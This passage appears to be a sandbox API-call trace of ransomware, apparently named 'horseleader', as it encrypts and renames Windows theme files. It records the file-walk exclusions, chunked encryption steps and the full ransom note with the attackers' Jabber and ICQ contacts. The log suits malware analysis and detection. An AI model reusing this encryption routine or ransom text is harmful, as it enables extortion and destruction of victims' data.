Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif.horseleader")) returned 1 [0247.093] GetProcessHeap () returned 0x780000 [0247.093] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.093] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7eb1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.093] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.093] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 81 [0247.094] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.094] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.094] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.094] lstrlenW (lpString=".testttjffg") returned 11 [0247.094] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.094] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.094] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.094] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.095] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 81 [0247.095] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.095] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=32433) returned 1 [0247.095] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.098] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.098] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.098] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2eb1, lpOverlapped=0x0) returned 1 [0247.098] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd14f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.099] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2eb1, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2eb1, lpOverlapped=0x0) returned 1 [0247.099] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.099] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.099] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.099] CloseHandle (hObject=0x1a4) returned 1 [0247.100] GetProcessHeap () returned 0x780000 [0247.100] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.100] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG.horseleader") returned 93 [0247.100] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png.horseleader")) returned 1 [0247.101] GetProcessHeap () returned 0x780000 [0247.101] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.101] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7eb1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.101] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.101] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\#Decrypt#.txt") returned 82 [0247.101] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.101] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0247.102] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.103] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.103] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.103] CloseHandle (hObject=0x158) returned 1 [0247.103] GetProcessHeap () returned 0x780000 [0247.103] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0247.103] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60af2a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60af2a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="EXPEDITN", cAlternateFileName="")) returned 1 [0247.103] lstrcmpiW (lpString1="EXPEDITN", lpString2="Windows") returned -1 [0247.103] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN") returned 68 [0247.103] lstrcmpW (lpString1="EXPEDITN", lpString2=".") returned 1 [0247.103] lstrcmpW (lpString1="EXPEDITN", lpString2="..") returned 1 [0247.103] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.103] GetProcessHeap () returned 0x780000 [0247.104] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0247.104] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\*") returned 70 [0247.104] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60af2a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60af2a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.104] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.104] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\.") returned 70 [0247.104] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.104] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60af2a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60af2a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.104] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.104] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\..") returned 71 [0247.104] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.104] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.104] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd690500, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x60af2a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfd690500, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x19539, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="EXPEDITN.ELM", cAlternateFileName="")) returned 1 [0247.104] lstrcmpiW (lpString1="EXPEDITN.ELM", lpString2="Windows") returned -1 [0247.104] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.ELM") returned 81 [0247.105] StrStrIW (lpFirst="EXPEDITN.ELM", lpSrch=".horseleader") returned 0x0 [0247.105] lstrcmpW (lpString1="EXPEDITN.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.105] lstrcmpW (lpString1="EXPEDITN.ELM", lpString2="_uninstalling_.png") returned 1 [0247.105] lstrlenW (lpString=".testttjffg") returned 11 [0247.105] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.ELM", lpSrch=".testttjffg") returned 0x0 [0247.105] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.105] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.105] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\expeditn.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.105] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.ELM") returned 81 [0247.105] StrStrW (lpFirst="EXPEDITN.ELM", lpSrch=".txt") returned 0x0 [0247.106] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=103737) returned 1 [0247.106] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.106] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.108] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.108] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.109] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xa29c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.109] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.109] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.109] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.110] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x14539, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.110] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.110] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.110] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.110] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.110] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.111] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.111] CloseHandle (hObject=0x1a4) returned 1 [0247.111] GetProcessHeap () returned 0x780000 [0247.111] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.111] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.ELM.horseleader") returned 93 [0247.111] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\expeditn.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\expeditn.elm.horseleader")) returned 1 [0247.112] GetProcessHeap () returned 0x780000 [0247.112] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.112] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x60af2a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x255, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="EXPEDITN.INF", cAlternateFileName="")) returned 1 [0247.112] lstrcmpiW (lpString1="EXPEDITN.INF", lpString2="Windows") returned -1 [0247.112] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.INF") returned 81 [0247.112] StrStrIW (lpFirst="EXPEDITN.INF", lpSrch=".horseleader") returned 0x0 [0247.112] lstrcmpW (lpString1="EXPEDITN.INF", lpString2="#Decrypt#.txt") returned 1 [0247.112] lstrcmpW (lpString1="EXPEDITN.INF", lpString2="_uninstalling_.png") returned 1 [0247.112] lstrlenW (lpString=".testttjffg") returned 11 [0247.112] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.INF", lpSrch=".testttjffg") returned 0x0 [0247.112] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.112] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.112] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\expeditn.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.115] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.INF") returned 81 [0247.115] StrStrW (lpFirst="EXPEDITN.INF", lpSrch=".txt") returned 0x0 [0247.115] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=597) returned 1 [0247.115] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x255, lpOverlapped=0x0) returned 1 [0247.117] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdab, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.117] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x255, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x255, lpOverlapped=0x0) returned 1 [0247.117] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.117] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.117] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.118] CloseHandle (hObject=0x1a4) returned 1 [0247.118] GetProcessHeap () returned 0x780000 [0247.118] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.118] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.INF.horseleader") returned 93 [0247.118] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.INF" (normalized: "c:\\program 